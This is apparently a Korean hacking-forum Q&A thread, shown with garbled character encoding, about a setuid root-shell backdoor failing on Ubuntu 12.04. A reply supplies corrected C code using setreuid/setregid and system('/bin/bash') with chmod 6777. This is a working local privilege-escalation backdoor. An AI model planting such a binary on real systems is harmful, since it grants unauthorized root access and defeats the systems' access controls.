¸®´ª½º

 3923, 11/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸®´ª½ºÆë±Ï
   ¿ìºÐÅõ¿¡¼­ ¹éµµ¾î°¡ ¾Èµ¹¾Æ°¡³ª¿ä?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4219 [º¹»ç]


#include <stdio.h>

int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}

ÀÌ·¸°Ô ÇÏ°í ½ÇÇàÀ» ½ÃÄ״µ¥,(¹°·Ð °ø°Ý´ë»óÀº Á¦ ÄÄÇ»ÅÍÀÔ´Ï´Ù. Á¦°¡ ·çÆ®°èÁ¤À¸·Î ÇØ´ç ¼Ò½º¸¦ Â¥°í ÄÄÆÄÀÏÇÑ µÚ, chmod 777·Î ¹Ù²ãÁá½À´Ï´Ù.)
½©ÀÌ ¾È¹Ù²î´õ±º¿ä.

µð¹ö±ë ÇÏ·Á°í printf ¸î°³ ¹Ú¾ÆºÃ´Âµ¥, setgid±îÁø Àß µÇ´Ù°¡ ½Ã½ºÅÛÇÔ¼ö¸¦ ¾Æ¿¹ ½ÇÇàÀ» ¾ÈÇØ¿ä. µð¹ö°Å·Î µð½º¾î¼Àºí ÇغÁµµ µüÈ÷ ¹®Á¦´Â ¾ø´Âµ¥, µð¹ö°Å¿¡¼­ ºê·¹ÀÌÅ© ÇÑ ÁÙ¿¡ Çϳª¾¿ ¹Ú°í °¨½Ã¸¦ Çصµ, system("/bin/bash"); ¸¦ ¹«½ÃÇÏ°í Áö³ª°¡³×¿ä.

¿ìºÐÅõ 12.04LTS Àε¥, º¸¾È»ó ¸·Èù°Ç°¡¿ä?

  Hit : 3705     Date : 2012/10/13 07:00



    
cd80 systemÇÔ¼ö°¡ ruid rgid¸¦ °¡Á®¿À±â¶§¹®¿¡
setuid¿Í setgid·Î ¼³Á¤ÇÑ ·çÆ® uid gid·Î´Â ·çÆ®±ÇÇÑÀÇ ½©À» ½ÇÇàÇÒ ¼ö ¾ø½À´Ï´Ù

¼Ò½º¸¦


#include <stdio.h>

int main() {
setreuid(0, 0);
setregid(0, 0);
system("/bin/bash");
}
¿Í °°ÀÌ ¹Ù²Ù½ÅÈÄ ÄÄÆÄÀÏ ÇϽÅÈÄ
chmod 777ÀÌ ¾Æ´Ñ
chmod 6777 ·Î ±ÇÇѼ³Á¤ÇØÁÖ½Ã¸é ¿øÇϽô´ë·Î ÇÏ½Ç ¼ö ÀÖÀ¸½Ç°Í °°½À´Ï´Ù



p.s. ±×¸®°í ¾Æ¸¶ /bin/bash´Â ½ÇÇàµÈ°Å°°½À´Ï´Ù
ps ¸í·É¾î·Î È®ÀÎÇغ¸¼¼¿ä
2012/10/13  
ISHack setuid¶ó¸é 4777ÀÌ ¾Æ´Ò±î¿ä? 2012/10/14  
cd80 ISHack//
ÀÛ¼ºÀÚ´ÔÀÌ ¼Ò½º¿¡¼­ ¿øÇÏ½Ã´Â°Ô uid¿Í gid ¸ðµÎ ¹Ù²Ù´Â°Å¶ó setuid¿Í setgid¸¦ °É¾îÁà¾ß Çϴµ¥
setuid´Â 4°í setgid´Â 2¶ó µÑÀ» ´õÇÑ 6ÀÌ setuid + setgidÀÔ´Ï´Ù
2012/10/15  
ISHack cd80//
¾ÆÇÏ. ´Ù½ÃÀо´Ï À¯Àú¿Í ±×·ìÀ» µ¿½Ã¿¡ »ç¿ëÇؾßÇϴ±º¿ä!
2012/10/16  
3723   ¸®´ª½º ¸í·É¾îÀÇ ¿É¼Ç ¼ø¼­ »ó°üÀÖ³ª¿ä?     1qwe1qwe
11/19 2853
3722   ¸®´ª½º¿¡¼­ shutdown ¸í·É[1]     1qwe1qwe
11/19 3327
3721   ¸®´ª½º ¸í·É¾î ( ; ) °ú ( | ) Áú¹® µå¸³´Ï´Ù.[2]     kmc8724
11/17 2808
3720   centos 5.3 ³×Æ®¿öÅ© ¼³Ä¡½Ã ¹®Á¦°¡ ÀÖ½À´Ï´Ù     marlosin
11/15 3227
3719   ¸®´ª½º ÇÏÀ§Æú´õ ±îÁö »èÁ¦ÇÒ¶§ ¸í·É¾î...[3]     1qwe1qwe
11/14 7531
3718   ¸®´ª½º ¼³Ä¡½Ã ÆÄƼ¼Ç ¼³Á¤ Áú¹®ÀÔ´Ï´Ù.     powerima
11/12 2275
3717   VMware 2°³¸¦ µ¹¸®°ÔµÇ¸é?     jin189
11/07 2806
3716   ±¸½Ä ³ëÆ®ºÏ¿¡ centos 6.3 ¼³Ä¡ÇÒ ¿¹Á¤Àε¥¿ä     marlosin
11/02 2371
3715   Æäµµ¶ó 12 ÀÌ°Å ¹¹°¡¹®Á¦¿¡¿ä?[1]     han7685
11/01 2178
3714   ¹éÆ®·¢ ¿À·ù     motae1122
10/22 2266
3713   backtrack5 r3 usb ºÎÆÿ¡·¯     motae1122
10/22 3189
3712   windows 7°ú centos 6.3 ¸ÖƼ·Î´õ »ç¿ëÁß¿¡ ¹®Á¦°¡ ÀÖ½À´Ï´Ù[1]     marlosin
10/21 3634
3711   VMware¾È¿¡ ÀÖ´Â ¸®´ª½º(Æ嵶ó)·Î pingÀÌ º¸³»ÁöÁö¾Ê½À´Ï´Ù.[1]     dudgns0908
10/20 4249
3710   ¸®´ª½º À缳ġ     yj6393
10/16 2253
3709   VM ware¿¡¼­ CentOS¸¦ ±ò·Á°í Çϴµ¥ ¿À·ù°¡ °è¼Ó³ª³×¿ä.. µµ¿ÍÁÖ¼¼¿ä ¤Ì¤Ì[2]     ysp0530
10/13 5984
  ¿ìºÐÅõ¿¡¼­ ¹éµµ¾î°¡ ¾Èµ¹¾Æ°¡³ª¿ä?[4]     ¸®´ª½ºÆë±Ï
10/13 3704
3707   xinetd·Î ÀÛµ¿ÇÏ´Â ÇÁ·Î±×·¥ printf°¡ ³ªÁß¿¡ Ãâ·ÂµÇ´Â ÀÌÀ¯°¡ ¹«¾ùÀΰ¡¿ä?[3]     attainer
10/12 4217
3706   ³ëÆ®ºÏ Çϳª¸¸ °ñ¶óÁÖ¼¼¿ä~ ¸®´ª½º»ç¿ëÀÔ´Ï´Ù.[2]     jin189
10/08 2208
3705   ¸®´ª½º ¸Þ¸ð¸® ´ýÇÁÆÄÀÏ ºÐ¼® Áú¹®ÀÌ¿ä ¤Ð¤Ð     icorra
10/05 3459
3704   vmware player¿ë ¸®´ª½º ¹éÆ®·¢ Áú¹®     qudgk1177
10/02 2515
[1].. 11 [12][13][14][15][16][17][18][19][20]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org